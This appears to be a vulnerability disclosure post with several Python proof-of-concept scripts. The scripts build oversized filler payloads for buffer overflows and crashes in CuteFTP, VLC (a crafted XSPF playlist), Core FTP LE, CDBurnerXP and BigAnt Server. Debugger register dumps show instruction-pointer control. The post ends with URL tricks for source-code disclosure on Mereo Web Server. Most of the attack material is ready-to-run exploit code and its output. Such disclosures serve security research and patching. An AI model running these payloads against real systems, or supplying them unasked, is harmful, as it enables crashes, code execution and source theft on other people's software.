
Multiple Vulnerabilities



Usually I submit via milw0rm but it has been unresponsive all week. 

Here are a few new vulnerabilities and updates.

-Dr_IDE
#!/usr/bin/env python

#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Download: 	http://www.cuteftp.com/downloads/
# Tested On:	Windows 7 RC, XP might be more shell friendly
# Notes: 	This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# 		Because of differences in the internal process of each site type you may be able to get
#		execution through one of these channels.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""

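# CuteFTP "Create New Site" PoC: write one oversized label string to a text file.
#
# The file holds 20000 'A' (0x41) bytes. Nothing here touches the network; the
# script only creates CuteFTP.txt in the current working directory and prints the
# author's usage banner.
buff = "\x41" * 20000

try:
    # `with` closes the handle even if write() raises; the original
    # open/write/close sequence left the file open on error.
    with open("CuteFTP.txt", "w") as f1:
        f1.write(buff)
except (IOError, OSError):
    # Only filesystem errors are expected here. The original bare `except:` would
    # also have swallowed KeyboardInterrupt and genuine bugs.
    print("[-] Error. File couldn't be created.")
else:
    # NOTE(review): the header comment above says v8.3.3 while this banner says
    # v8.3.2 -- confirm which build was actually tested.
    print("\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC")
    print("By: Dr_IDE")
    print("\nFile Created Successfully.\n")
    print("Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom.")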
##########################################################################################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By:	Dr_IDE
# Tested:	Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download:	http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947
#
##########################################################################################################

# XPSP3 Crash 
"""
EAX FFFFFFFE
ECX 42424242        <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFAC000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
               3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""
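# VLC 1.0.2 smb:// PoC: build an XSPF playlist whose single track location carries
# an oversized string, and write it to vlc_1.0.2.xspf in the current directory.
#
# NOTE(review): the ';' following the quoted xmlns/application URIs below is kept
# exactly as published; it looks like list-archive mangling of the original XML
# rather than something intentional -- confirm against the author's copy before
# changing it.
header1 = (
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    "<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\"; xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\";>\n"
    "\t<title>Playlist</title>\n"
    "\t<trackList>\n"
    "\t\t<track>\n"
    "\t\t\t<location>smb://example.com@xxxxxxxxxxxxxxx/foo/#{"
)

# 2 'A' bytes, 4 'B' bytes, then 10000 'C' bytes of filler -- kept exactly as
# published.
payload = "\x41" * 2 + "\x42" * 4 + "\x43" * 10000

header2 = (
    "}</location>\n"
    "\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\";>\n"
    "\t\t\t\t<vlc:id>0</vlc:id>\n"
    "\t\t\t</extension>\n"
    "\t\t</track>\n"
    "\t</trackList>\n"
    "</playlist>\n"
)

try:
    # `with` guarantees the handle is closed even when write() fails.
    with open("vlc_1.0.2.xspf", "w") as f1:
        f1.write(header1 + payload + header2)
except (IOError, OSError):
    # Narrowed from a bare `except:` so that KeyboardInterrupt and real bugs are
    # not reported as a write failure.
    print("Error")
else:
    print("\nExploit file created!\n")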
#!/usr/bin/env python

####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Notes:	Most likely other versions are vulnerable too.
# Usage:	File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################

# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
"""

# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041

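# Core FTP LE PoC: write 6000 'A' (0x41) bytes to coreftple.txt in the current
# working directory. The author's "Usage" note above covers what is done with it.
buff = "\x41" * 6000

# `with` closes the handle even if write() raises; the original open/write/close
# sequence left it open on error.
with open("coreftple.txt", "w") as f1:
    f1.write(buff)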
#!/usr/bin/env python

####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Usage:	Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes:	Super lame and most likely not exploitable.
#
####################################################################################

'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
   at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
   at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
   at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
   at System.Windows.Forms.MenuItem.MenuItemData.Execute()
   at System.Windows.Forms.Command.Invoke()
   at System.Windows.Forms.Command.DispatchID(Int32 id)
   at System.Windows.Forms.Control.WmCommand(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
   at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''

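# CDBurnerXP crash PoC: write 5000 'A' (0x41) bytes to cdburnerxp.txt in the
# current working directory. The author's own notes above rate this as a plain
# crash ("most likely not exploitable").
buff = "\x41" * 5000

# `with` closes the handle even if write() raises; the original open/write/close
# sequence left it open on error.
with open("cdburnerxp.txt", "w") as f1:
    f1.write(buff)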

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

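# BigAnt Server plug-in PoC: write 10000 'A' (0x41) bytes to BigAntPlugIn.zip in
# the current working directory. The file is not a valid ZIP archive; it is a
# raw filler string under a .zip name, as published.
buff = "\x41" * 10000

# Text mode is kept as published: the content is pure ASCII with no newlines, so
# no newline translation can alter the bytes written. `with` closes the handle
# even if write() raises.
with open("BigAntPlugIn.zip", "w") as f1:
    f1.write(buff)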
#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################

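# BigAnt Server update PoC: write 10000 'A' (0x41) bytes to BigAntUpdate.zip in
# the current working directory. The file is not a valid ZIP archive; it is a
# raw filler string under a .zip name, as published.
#
# NOTE(review): both BigAnt headers in this post are labelled "PoC #2"; only the
# output file name and the console feature named in "Usage" (Plug-In vs Update)
# differ between them.
buff = "\x41" * 10000

# Text mode is kept as published: the content is pure ASCII with no newlines, so
# no newline translation can alter the bytes written. `with` closes the handle
# even if write() raises.
with open("BigAntUpdate.zip", "w") as f1:
    f1.write(buff)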
#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

Mereo Web Server v1.8 is a Windows-based HTTP server. This is the latest version of
the application available.

Mereo is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][.]
	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html.
	http://172.16.2.101/index.html::$DATA